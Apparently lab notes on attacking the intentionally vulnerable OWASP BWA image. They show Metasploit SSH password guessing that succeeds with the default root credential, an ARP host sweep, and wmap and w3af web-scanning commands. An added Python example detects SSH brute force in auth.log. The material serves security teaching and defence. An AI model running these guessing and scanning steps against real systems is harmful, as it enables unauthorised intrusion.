    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Password guessing succeeded: root:owaspbwa is the default credential of the OWASP BWA image, and a successful guess gives a shell session directly.

Host discovery experiment:

    msf > use auxiliary/scanner/discovery/arp_sweep
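Seen from the target, the run above leaves a characteristic trace in sshd's log: a burst of failed root logins from one source followed by an accepted one. The Python below is an added example, not part of the report, of the check an operator would run over auth.log: it parses constructed log lines (addresses, pids and times are made up; the three-attempt pattern mirrors the ssh_login output), groups them by source address, and flags any source that reaches a failure threshold, separately noting when a success follows those failures inside a time window, the signature of a guessed password rather than a typo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample of /var/log/auth.log on the target. Addresses, pids and
# times are made up; the three-attempt shape mirrors the ssh_login run above.
SAMPLE_LOG = """\
Mar 14 13:51:28 owaspbwa sshd[2101]: Failed password for root from 10.0.0.28 port 40151 ssh2
Mar 14 13:51:29 owaspbwa sshd[2103]: Failed password for root from 10.0.0.28 port 40153 ssh2
Mar 14 13:51:30 owaspbwa sshd[2105]: Accepted password for root from 10.0.0.28 port 40157 ssh2
Mar 14 13:52:01 owaspbwa sshd[2110]: Accepted publickey for deploy from 10.0.0.5 port 51022 ssh2
Mar 14 14:10:12 owaspbwa sshd[2150]: Failed password for invalid user test from 10.0.0.77 port 41000 ssh2
Mar 14 14:10:13 owaspbwa sshd[2150]: Connection closed by 10.0.0.77 [preauth]
"""

# sshd's Accepted/Failed lines; 'invalid user' marks a name that does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Accepted|Failed)\s+(?P<method>\w+)\s+for\s+(?:invalid user\s+)?"
    r"(?P<user>\S+)\s+from\s+(?P<src>\S+)\s+port\s+(?P<port>\d+)"
)


def parse_auth_log(text: str) -> List[dict]:
    """Turn sshd Accepted/Failed lines into events; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")  # syslog omits the year
        ev["port"] = int(ev["port"])
        events.append(ev)
    return events


def detect_bruteforce(events: List[dict], min_failures: int = 2,
                      window: timedelta = timedelta(minutes=10)) -> Dict[str, dict]:
    """Per source address: report it when it has at least min_failures failed
    logins, and set success_after_failures when an Accepted login follows that
    many failures from the same source inside the window (a guessed password)."""
    by_src: Dict[str, List[dict]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_src[ev["src"]].append(ev)
    findings: Dict[str, dict] = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e["result"] == "Failed"]
        success_after = False
        for ev in evs:
            if ev["result"] != "Accepted":
                continue
            recent = [f for f in failures if ev["ts"] - window <= f["ts"] < ev["ts"]]
            if len(recent) >= min_failures:
                success_after = True
        if len(failures) >= min_failures or success_after:
            findings[src] = {
                "failures": len(failures),
                "success_after_failures": success_after,
                "users": sorted({e["user"] for e in evs}),
            }
    return findings


if __name__ == "__main__":
    for src, info in detect_bruteforce(parse_auth_log(SAMPLE_LOG)).items():
        print(src, info)
```

With ssh_login's THREADS set to 50 against a longer PASS_FILE the failure count alone trips the rule long before any success; the success-after-failures flag is what separates a compromised account from background noise and is the event to page on.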

    msf auxiliary(arp_sweep) > show options

    Module options (auxiliary/scanner/discovery/arp_sweep):
       Name       Current Setting  Required  Description
       INTERFACE                   no        The name of the interface
       RHOSTS                      yes       The target address range or CIDR identifier
       SHOST                       no        Source IP Address
       SMAC                        no        Source MAC Address
       THREADS    1                yes       The number of concurrent threads
       TIMEOUT    5                yes       The number of seconds to wait for new data

    msf auxiliary(arp_sweep) > set RHOSTS ...
    msf auxiliary(arp_sweep) > set THREADS 50
    THREADS => 50
    msf auxiliary(arp_sweep) > run
    [*] xx.xx.xx.xx appears to be up (VMware, Inc.).
    [*] xx.xx.xx.xx appears to be up (VMware, Inc.).
    [*] xx.xx.xx.29 appears to be up (VMware, Inc.).
    [*] xx.xx.xx.30 appears to be up (VMware, Inc.).
    [*] xx.xx.xx.54 appears to be up (VMware, Inc.).
    [*] xx.xx.xx.54 appears to be up (VMware, Inc.).
    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed

ARP sweep only reaches hosts on the local Ethernet segment, but there it finds every host, including ones that drop ICMP, which is why it is the right first step on the NAT lab network.

Network scanning: OpenVAS and similar.

Web scanning

1. wmap (under modules/auxiliary):
       load wmap                       initialise wmap
       wmap_sites -a <url>             add a site to scan
       wmap_sites -l                   list the sites
       wmap_targets -t http://XXXX     set the target
       wmap_run -t                     show the auxiliary modules wmap will run against the target
       wmap_run -e                     run them
       vulns                           view the results

2. w3af, a very practical scanner (cd /usr/share/w3af/):
       w3af_console
       plugins
       audit xss sql                   xss: cross-site scripting; sql: SQL injection
       back
       plugins
       output html_file, console
       output config html_file
       set output_file 123.html
       set verbose True
       back
       back
       plugins
       crawl web_spider
       crawl config web_spider
       set only_forward True
       set follow_regex .*
       set ignore_regex
       back
       back
       target
       set target <url>
       back

3. Injection keywords: parameterised queries; filtering (whitelist); encoding (used to get past anti-injection filters); MySQL wide-byte injection; second-order injection (treat every input as hostile); error handling (inputs that force errors); least privilege (at present a great many sites run the database as root; see WooYun).

...0:8972/qhwxcs-djy/login.jsp: once the username and password are found you can log in.

Scan experiment:

    root@kali:~# cd /usr/share/w3af/
    root@kali:/usr/share/w3af# w3af_console
    w3af>>> plugins
    w3af/plugins>>> help
    | list            | List available plugins.                            |
    | back            | Go to the previous menu.                           |
    | exit            | Exit w3af.                                         |
    | bruteforce      | View, configure and enable bruteforce plugins      |
    | infrastructure  | View, configure and enable infrastructure plugins  |
    | evasion         | View, configure and enable evasion plugins         |
    | mangle          | View, configure and enable mangle plugins          |
    | audit           | View, configure and enable audit plugins           |
    | grep            | View, configure and enable grep plugins            |
    | output          | View, configure and enable output plugins          |
    | auth            | View, configure and enable auth plugins            |
    | crawl           | View, configure and enable crawl plugins           |
    w3af/plugins>>> audit
    | Plugin name      | Status | Conf | Description                                                    |
    | blind_sqli       |        | Yes  | Identify blind SQL injection vulnerabilities.                  |
    | buffer_overflow  |        |      | Find buffer overflow vulnerabilities.                          |
    | cors_origin      |        | Yes  | Inspect if application checks that the value of the Origin HTTP header is consistent with the value of the remote IP address/Host of the sender of the incoming HTTP request. |
    | csrf             |        |      | Identify Cross-Site Request Forgery vulnerabilities.           |
    | dav              |        |      | Verify if the WebDAV module is properly configured.            |
    | eval             |        | Yes  | Find insecure eval() usage.                                    |
    | file_upload      |        | Yes  | Uploads a file and then searches for ...                       |
